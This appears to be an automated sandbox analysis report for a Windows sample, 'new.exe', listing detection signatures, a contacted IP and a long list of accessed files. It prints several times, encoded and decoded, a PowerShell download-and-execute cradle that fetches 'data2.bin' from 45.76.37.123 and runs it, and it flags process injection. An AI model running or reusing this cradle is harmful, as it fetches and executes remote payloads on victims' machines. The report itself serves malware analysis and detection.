Process: new.exe -> C:\Windows\sysnative\windowspowershell\v1.0\powershell.exe -nop -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA0ADUALgA3ADYALgAzADcALgAxADIAMwAvAGQAYQB0AGEAMgAuAGIAaQBuACcAKQA=
Executed a very long command line or script command which may be indicative of chained commands or obfuscation
command: C:\Windows\sysnative\windowspowershell\v1.0\powershell.exe -nop -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA0ADUALgA3ADYALgAzADcALgAxADIAMwAvAGQAYQB0AGEAMgAuAGIAaQBuACcAKQA=
HTTP traffic contains suspicious features which may be indicative of malware related traffic
get_no_useragent: HTTP traffic contains a GET request with no user-agent header
ip_hostname: HTTP connection was made to an IP address rather than domain name
suspicious_request: http://45.76.37.123/data2.bin
Performs some HTTP requests
url: http://45.76.37.123/data2.bin
A scripting utility was executed
command: C:\Windows\sysnative\windowspowershell\v1.0\powershell.exe -nop -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA0ADUALgA3ADYALgAzADcALgAxADIAMwAvAGQAYQB0AGEAMgAuAGIAaQBuACcAKQA=
Uses Windows utilities for basic functionality
command: "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\9zdcwezu.cmdline"
Behavioural detection: Injection (inter-process)
A script or command line contains a long continuous string indicative of obfuscation
command: C:\Windows\sysnative\windowspowershell\v1.0\powershell.exe -nop -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA0ADUALgA3ADYALgAzADcALgAxADIAMwAvAGQAYQB0AGEAMgAuAGIAaQBuACcAKQA=
Attempts to execute suspicious powershell command arguments
command: C:\Windows\sysnative\windowspowershell\v1.0\powershell.exe -nop -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA0ADUALgA3ADYALgAzADcALgAxADIAMwAvAGQAYQB0AGEAMgAuAGIAaQBuACcAKQA=
decoded_base64_string: I\x00E\x00X\x00 \x00(\x00N\x00e\x00w\x00-\x00O\x00b\x00j\x00e\x00c\x00t\x00 \x00S\x00y\x00s\x00t\x00e\x00m\x00.\x00N\x00e\x00t\x00.\x00W\x00e\x00b\x00C\x00l\x00i\x00e\x00n\x00t\x00)\x00.\x00D\x00o\x00w\x00n\x00l\x00o\x00a\x00d\x00S\x00t\x00r\x00i\x00n\x00g\x00(\x00'\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x004\x005\x00.\x007\x006\x00.\x003\x007\x00.\x001\x002\x003\x00/\x00d\x00a\x00t\x00a\x002\x00.\x00b\x00i\x00n\x00'\x00)\x00

Screenshots


Hosts

Direct IP Country Name
Y 45.76.37.123 [VT] Netherlands

DNS

No domains contacted.


Summary

C:\Windows\WindowsShell.Manifest
\Device\KsecDD
\??\MountPointManager
C:\Users\user\AppData\Local\Temp\
C:\Users\user\AppData\Local\Temp
C:\Users\user\AppData\Local\Temp\nst6FC3.tmp
C:\Users\user\AppData\Local\Temp\new.exe
C:\Users
C:\Users\user
C:\Users\user\AppData
C:\Users\user\AppData\Local
C:\Users\user\AppData\Local\Temp\255757898
C:\Windows\SysWOW64\ieframe.dll
C:\Users\user\AppData\Local\Temp\nse9B27.tmp
C:\Users\user\AppData\Local\Temp\nse9B27.tmp\System.dll
C:\Windows\SysWOW64\ntdll.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe
C:\Windows
C:\Windows\sysnative
C:\Windows\sysnative\WindowsPowerShell\v1.0
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
C:\
C:\Users\user\AppData\Local\Microsoft\Windows\Caches
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db
C:\Users\desktop.ini
C:\Users\user\AppData\Roaming
C:\Users\user\AppData\Roaming\Microsoft
C:\Users\user\AppData\Roaming\Microsoft\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
C:\Users\user\Desktop\desktop.ini
::\
::\{2559A1F3-21D7-11D4-BDAF-00C04F60B9F0}
::\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
::\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}
::\{2559A1F1-21D7-11D4-BDAF-00C04F60B9F0}
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu
C:\ProgramData
C:\ProgramData\Microsoft
C:\ProgramData\Microsoft\desktop.ini
C:\ProgramData\Microsoft\Windows
C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini
::\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}
C:\ProgramData\Microsoft\Windows\Start Menu\Programs
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini
C:\Users\user\Desktop
C:\Users\Public\Desktop
C:\Users\Public
C:\Users\Public\desktop.ini
C:\Users\Public\Desktop\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
C:\Users\user\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk\desktop.ini
C:\Windows\sysnative\windowspowershell\v1.0\en-US\powershell.exe.mui
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
\??\PIPE\srvsvc
C:\DosDevices\pipe\
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\
C:\Windows\sysnative\windowspowershell\v1.0\powershell_ise.exe
C:\Windows\sysnative\windowspowershell
C:\Windows\sysnative\WindowsPowerShell
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell_ise.exe
C:\Windows\sysnative\WindowsPowerShell\v1.0\
C:\Windows\hh.exe
C:\Windows\
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VSG2JVG94V2257O0TMPH.temp
C:\Windows\sysnative\mscoree.dll.local
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework64\*
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll
C:\Windows\sysnative\windowspowershell\v1.0\powershell.exe.config
C:\Windows\sysnative\windowspowershell\v1.0\powershell.exe.Local\
C:\Windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_88df89932faf0bf6
C:\Windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_88df89932faf0bf6\msvcr80.dll
C:\Windows\winsxs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\fusion.localgac
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_64\index169.dat
C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\9469491f37d9c35b596968b206615309\mscorlib.ni.dll
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ole32.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\OLEAUT32.dll
C:\Windows\Globalization\en-gb.nlp
C:\Windows\Globalization\en-us.nlp
C:\Windows\SysWOW64\windowspowershell\v1.0\powershell.config
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\assembly\NativeImages_v2.0.50727_64\System\adff7dd9fe8e541775c46b6363401b22\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b023321bc53c20c10ccbbd8f78c82c82\Microsoft.PowerShell.ConsoleHost.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.INI
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management.A#\009a09f5b2322bb8c5520dc5ddbb28bb\System.Management.Automation.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.INI
C:\Windows\sysnative\l_intl.nls
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\ntdll.dll
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Core\83e2f6909980da7347e7806d8c26670e\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\ec50af274bf7a15fb59ac1f0d353b7ea\Microsoft.PowerShell.Commands.Diagnostics.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.INI
C:\Windows\assembly\GAC_MSIL\System.Core\3.5.0.0__b77a5c561934e089\System.Core.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuratio#\fcf35536476614410e0b0bd0e412199e\System.Configuration.Install.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.WSMan.Man#\8cd73e65058ef6f77f36b62a74ec3344\Microsoft.WSMan.Management.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.INI
C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Transactions\051655963f24f9ade08486084c570086\System.Transactions.ni.dll
C:\Windows\assembly\GAC_64\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.INI
C:\Windows\assembly\GAC_64\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\cdf48153115fc0bb466f37b7dcad9ac5\Microsoft.PowerShell.Commands.Utility.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\9206dc8156588e608d405729c833edc5\Microsoft.PowerShell.Commands.Management.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b5a6a5ce3cd3d4dd2b151315c612aeff\Microsoft.PowerShell.Security.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.INI
C:\Windows\Globalization\en.nlp
C:\Windows\assembly\GAC_64\Microsoft.PowerShell.ConsoleHost.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC\Microsoft.PowerShell.ConsoleHost.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\SysWOW64\windowspowershell\v1.0\en-US\Microsoft.PowerShell.ConsoleHost.resources.dll
C:\Windows\SysWOW64\windowspowershell\v1.0\en-US\Microsoft.PowerShell.ConsoleHost.resources\Microsoft.PowerShell.ConsoleHost.resources.dll
C:\Windows\SysWOW64\windowspowershell\v1.0\en-US\Microsoft.PowerShell.ConsoleHost.resources.exe
C:\Windows\SysWOW64\windowspowershell\v1.0\en-US\Microsoft.PowerShell.ConsoleHost.resources\Microsoft.PowerShell.ConsoleHost.resources.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\en-US\mscorrc.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\en-US\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\en\mscorrc.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\en\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorjit.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\ee795155543768ea67eecddc686a1e9e\System.Xml.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.Xml.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management\c44929bde355680c886f8a52f5e22b81\System.Management.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.DirectorySer#\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\System.DirectoryServices.ni.dll
C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.INI
C:\Windows\assembly\GAC_64\System.Management.Automation.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC_MSIL\System.Management.Automation.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC\System.Management.Automation.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\SysWOW64\windowspowershell\v1.0\en-US\System.Management.Automation.resources.dll
C:\Windows\SysWOW64\windowspowershell\v1.0\en-US\System.Management.Automation.resources\System.Management.Automation.resources.dll
C:\Windows\SysWOW64\windowspowershell\v1.0\en-US\System.Management.Automation.resources.exe
C:\Windows\SysWOW64\windowspowershell\v1.0\en-US\System.Management.Automation.resources\System.Management.Automation.resources.exe
C:\Windows\sysnative\WindowsPowerShell\v1.0\GetEvent.types.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\types.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\WSMan.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\Certificate.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\FileSystem.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\Help.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\Registry.format.ps1xml
C:\Windows\sysnative\tzres.dll
C:\Windows\assembly\GAC_64\Microsoft.WSMan.Management.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC\Microsoft.WSMan.Management.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\SysWOW64\windowspowershell\v1.0\en-US\Microsoft.WSMan.Management.resources.dll
C:\Windows\SysWOW64\windowspowershell\v1.0\en-US\Microsoft.WSMan.Management.resources\Microsoft.WSMan.Management.resources.dll
C:\Windows\SysWOW64\windowspowershell\v1.0\en-US\Microsoft.WSMan.Management.resources.exe
C:\Windows\SysWOW64\windowspowershell\v1.0\en-US\Microsoft.WSMan.Management.resources\Microsoft.WSMan.Management.resources.exe
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\secur32.dll
C:\Windows\assembly\GAC_64\Microsoft.PowerShell.Security.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC\Microsoft.PowerShell.Security.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\SysWOW64\windowspowershell\v1.0\en-US\Microsoft.PowerShell.Security.resources.dll
C:\Windows\SysWOW64\windowspowershell\v1.0\en-US\Microsoft.PowerShell.Security.resources\Microsoft.PowerShell.Security.resources.dll
C:\Windows\SysWOW64\windowspowershell\v1.0\en-US\Microsoft.PowerShell.Security.resources.exe
C:\Windows\SysWOW64\windowspowershell\v1.0\en-US\Microsoft.PowerShell.Security.resources\Microsoft.PowerShell.Security.resources.exe
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Data\accc3a5269658c8c47fe3e402ac4ac1c\System.Data.ni.dll
C:\Windows\assembly\GAC_64\System.Data\2.0.0.0__b77a5c561934e089\System.Data.INI
C:\Windows\assembly\GAC_64\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuration\091b931d0f6408001747dbbbb05dbe66\System.Configuration.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\rasapi32.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\ws2_32.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\winhttp.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\iphlpapi.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.JScript\71e40c479d779f2bf55bb925834e3cd3\Microsoft.JScript.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.JScript\8.0.0.0__b03f5f7f11d50a3a\Microsoft.JScript.INI
C:\Users\user\AppData\Local\Temp\9zdcwezu.tmp
C:\Users\user\AppData\Local\Temp\9zdcwezu.0.cs
C:\Users\user\AppData\Local\Temp\9zdcwezu.dll
C:\Users\user\AppData\Local\Temp\9zdcwezu.cmdline
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
C:\Users\user\AppData\Local\Temp\9zdcwezu.out
C:\Users\user\AppData\Local\Temp\9zdcwezu.err
C:\Users\user\AppData\Local\Temp\9zdcwezu.pdb
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.2084.13816124
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.2084.13816124
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.2084.13816139
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\0\cscompui.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\0\cscompui.dll.DLL
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\1033\cscompui.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe.Local\
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\alink.dll
C:\Users\user\AppData\Local\Temp\System.dll
C:\Windows\Microsoft.NET
C:\Windows\Microsoft.NET\Framework64
C:\Windows\Microsoft.NET\Framework64\v2.0.50727
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\System.dll
C:\Windows\assembly
C:\Windows\assembly\GAC_MSIL
C:\Windows\assembly\GAC_MSIL\System.Management.Automation
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorlib.dll
C:\BVTBin\Tests\installpackage\csilogfile.log
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorpe.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\diasymreader.dll
C:\Users\user\AppData\Local\Temp\CSCC783.tmp
C:\Users\user\AppData\Local\Temp\RESC794.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\slideshow.ini
C:\Windows\WindowsShell.Manifest
\Device\KsecDD
C:\Users\user\AppData\Local\Temp\nst6FC3.tmp
C:\Users\user\AppData\Local\Temp\new.exe
C:\Windows\SysWOW64\ieframe.dll
C:\Users\user\AppData\Local\Temp\nse9B27.tmp
C:\Users\user\AppData\Local\Temp\nse9B27.tmp\System.dll
C:\Users\user\AppData\Local\Temp\255757898
C:\Windows\SysWOW64\ntdll.dll
C:\
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db
C:\Users\desktop.ini
C:\Users
C:\Users\user
C:\Users\user\AppData
C:\Users\user\AppData\Roaming
C:\Users\user\AppData\Roaming\Microsoft\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft
C:\Users\user\AppData\Roaming\Microsoft\Windows
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
C:\Users\user\Desktop\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini
C:\ProgramData
C:\ProgramData\Microsoft\desktop.ini
C:\ProgramData\Microsoft
C:\ProgramData\Microsoft\Windows
C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini
C:\Users\Public\desktop.ini
C:\Users\Public
C:\Users\Public\Desktop\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
C:\Users\user\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk\desktop.ini
C:\Windows\sysnative\windowspowershell\v1.0\en-US\powershell.exe.mui
C:\ProgramData\Microsoft\Windows\Start Menu\Programs
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell
\??\PIPE\srvsvc
C:\Windows
C:\Windows\sysnative
C:\Windows\sysnative\WindowsPowerShell
C:\Windows\sysnative\WindowsPowerShell\v1.0
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VSG2JVG94V2257O0TMPH.temp
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll
C:\Windows\sysnative\windowspowershell\v1.0\powershell.exe.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks.dll
C:\Windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_88df89932faf0bf6\msvcr80.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_64\index169.dat
C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\9469491f37d9c35b596968b206615309\mscorlib.ni.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\NativeImages_v2.0.50727_64\System\adff7dd9fe8e541775c46b6363401b22\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b023321bc53c20c10ccbbd8f78c82c82\Microsoft.PowerShell.ConsoleHost.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management.A#\009a09f5b2322bb8c5520dc5ddbb28bb\System.Management.Automation.ni.dll
C:\Windows\sysnative\l_intl.nls
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Core\83e2f6909980da7347e7806d8c26670e\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\ec50af274bf7a15fb59ac1f0d353b7ea\Microsoft.PowerShell.Commands.Diagnostics.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuratio#\fcf35536476614410e0b0bd0e412199e\System.Configuration.Install.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.WSMan.Man#\8cd73e65058ef6f77f36b62a74ec3344\Microsoft.WSMan.Management.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Transactions\051655963f24f9ade08486084c570086\System.Transactions.ni.dll
